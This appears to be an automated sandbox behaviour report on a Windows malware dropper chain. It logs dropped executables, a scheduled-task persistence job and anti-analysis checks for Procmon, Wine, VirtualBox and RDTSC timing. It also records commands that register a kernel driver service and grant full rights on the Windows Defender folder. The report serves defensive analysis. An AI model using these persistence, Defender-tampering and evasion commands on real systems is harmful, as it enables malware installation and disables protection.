Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe File created: C:\Users\user\AppData\Local\Temp\22.exe
Source: C:\Users\user\Desktop\SUAosT64HD.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe

Boot Survival

Source: C:\Users\user\Desktop\SUAosT64HD.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\SUAosT64HD.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\SUAosT64HD.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\SUAosT64HD.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\SUAosT64HD.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\SUAosT64HD.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SUAosT64HD.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\SUAosT64HD.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\SUAosT64HD.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 50F293 second address: 50F299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 50F299 second address: 50F29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 687689 second address: 68769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 687960 second address: 687966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 687966 second address: 687974 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC3507E5376h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 687AB8 second address: 687AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 68AE02 second address: 68AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 68AF67 second address: 68AF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC350C3E71Bh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 68B0B0 second address: 68B0B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 68B14D second address: 68B157 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 68B157 second address: 68B15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 673688 second address: 67368C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 67368C second address: 67369D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8751 second address: 6A875D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC350C3E716h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8890 second address: 6A8896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8896 second address: 6A88A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC350C3E716h 0x0000000d jnc 00007FC350C3E716h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A89FE second address: 6A8A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8A0F second address: 6A8A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8A13 second address: 6A8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8CE4 second address: 6A8CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8DFA second address: 6A8E06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8E06 second address: 6A8E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e pop esi 0x0000000f jc 00007FC350C3E71Ch 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007FC350C3E729h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8E4A second address: 6A8EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 jmp 00007FC3507E5384h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC3507E537Ah 0x00000014 jmp 00007FC3507E537Fh 0x00000019 popad 0x0000001a jns 00007FC3507E537Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8EA8 second address: 6A8EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A8EAE second address: 6A8EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A91B1 second address: 6A91C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A9362 second address: 6A9392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 jo 00007FC3507E5376h 0x0000000e jnl 00007FC3507E5376h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FC3507E5376h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6A9392 second address: 6A9396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6AA460 second address: 6AA466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6AA466 second address: 6AA46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6ADB4C second address: 6ADB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6ADB50 second address: 6ADB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6AE282 second address: 6AE294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jp 00007FC3507E5376h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B539A second address: 6B539E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B4B21 second address: 6B4B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC3507E5381h 0x0000000f popad 0x00000010 push ecx 0x00000011 jo 00007FC3507E5376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B4B46 second address: 6B4B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B4F90 second address: 6B4FB5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3507E5376h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC3507E5378h 0x00000012 popad 0x00000013 js 00007FC3507E538Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FC3507E5376h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8917 second address: 6B8926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8926 second address: 6B8945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jl 00007FC3507E5376h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8945 second address: 6B89A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC350C3E718h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FC350C3E719h 0x00000027 jmp 00007FC350C3E71Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jnp 00007FC350C3E716h 0x00000035 jmp 00007FC350C3E728h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B89A9 second address: 6B89DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007FC3507E538Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 je 00007FC3507E5380h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B89DF second address: 6B89FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8C9B second address: 6B8CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8CA1 second address: 6B8CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC350C3E716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B9565 second address: 6B956B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B956B second address: 6B956F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B956F second address: 6B9585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b mov si, FEF0h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B9585 second address: 6B9598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B9A89 second address: 6B9AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BA009 second address: 6BA00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
